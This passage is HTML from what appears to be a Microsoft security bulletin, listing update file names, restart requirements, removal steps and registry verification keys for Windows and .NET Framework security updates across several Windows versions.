Microsoft Windows, see <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">Security</strong>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-46\" target=\"_self\">Microsoft Knowledge Base article 3191203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 7 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x86.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x86.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-47\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-48\" target=\"_self\">Microsoft Knowledge Base article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-49\" target=\"_self\">Microsoft Knowledge Base article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 R2 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-ia64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-ia64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-50\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-51\" target=\"_self\">Microsoft Knowledge Base article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-52\" target=\"_self\">Microsoft Knowledge Base article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 8.1 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x86.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x86.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-53\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-54\" target=\"_self\">Microsoft Knowledge Base article 3192392</a><br/>See <a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-55\" target=\"_self\">Microsoft Knowledge Base article 3185331</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2012 and Windows Server 2012 R2 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3192393-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3185332-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-56\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-57\" target=\"_self\">Microsoft Knowledge Base article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-58\" target=\"_self\">Microsoft Knowledge Base article 3185332</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows RT 8.1 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3192392 update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-59\" target=\"_self\">Windows Update</a> only. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-60\" target=\"_self\">Microsoft Knowledge Base article 3192392</a></td></tr></table></div><h4 class=\"sbody-h4\"> Windows 10 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft Windows, see <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-61\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-62\" target=\"_self\">Microsoft Knowledge Base article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-63\" target=\"_self\">Microsoft Knowledge Base article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-64\" target=\"_self\">Microsoft Knowledge Base article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Vista (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Vista for the Security Only Release.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3188726-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP45-KB3189039-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP46-KB3189040-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3188726-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP45-KB3189039-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP46-KB3189040-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-65\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>Microsoft .NET Framework 3.0-KB3188726_*-msi0.txt<br/>Microsoft .NET Framework 3.0-KB3188726_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>KB3189039_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189039_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>KB3189040_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189040_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Microsoft .NET Framework:<br/>Click<span class=\"text-base\"> Control Panel</span>, and then click <strong class=\"uiterm\">Security</strong>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188726\" id=\"kb-link-66\" target=\"_self\">Microsoft Knowledge Base article 3188726</a><br/>See <a href=\"https://support.microsoft.com/help/3189039\" id=\"kb-link-67\" target=\"_self\">Microsoft Knowledge Base article 3189039</a><br/>See <a href=\"https://support.microsoft.com/help/3189040\" id=\"kb-link-68\" target=\"_self\">Microsoft Knowledge Base article 3189040</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework <span class=\"sbody-italic\">[.NET target version]</span>\\KB3189039<br/>\u201dThisVersionInstalled\u201d = \u201cY\u201d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework 4.6\\ KB3189040<br/>\"ThisVersionInstalled\" = \"Y\"</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Server 2008 for the Security Only Release.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3188726-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP45-KB3189039-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP46-KB3189040-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3188726-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP45-KB3189039-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP46-KB3189040-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-69\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>Microsoft .NET Framework 3.0-KB3188726_*-msi0.txt<br/>Microsoft .NET Framework 3.0-KB3188726_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>KB3189039_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189039_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>KB3189040_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189040_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Microsoft .NET Framework:<br/>Click<span class=\"text-base\"> Control Panel</span>, and then click Security. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188726\" id=\"kb-link-70\" target=\"_self\">Microsoft Knowledge Base article 3188726</a><br/>See <a href=\"https://support.microsoft.com/help/3189039\" id=\"kb-link-71\" target=\"_self\">Microsoft Knowledge Base article 3189039</a><br/>See <a href=\"https://support.microsoft.com/help/3189040\" id=\"kb-link-72\" target=\"_self\">Microsoft Knowledge Base article 3189040</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework <span class=\"sbody-italic\">[.NET target version]</span>\\KB3189039<br/>\u201dThisVersionInstalled\u201d = \u201cY\u201d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework 4.6\\ KB3189040<br/>\"ThisVersionInstalled\" = \"Y\"</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 7 Service Pack 1 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 7 Service Pack 1 for the Security Only Release..<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported 32-bit editions of Windows 7 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188730-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported x64-based editions of Windows 7 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188730-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-73\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188730\" id=\"kb-link-74\" target=\"_self\">Microsoft Knowledge Base article 3188730</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 R2 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Server 2008 R2 for the Security Only Release..<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported x64-based editions of Windows Server 2008 R2 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188730-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-75\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong 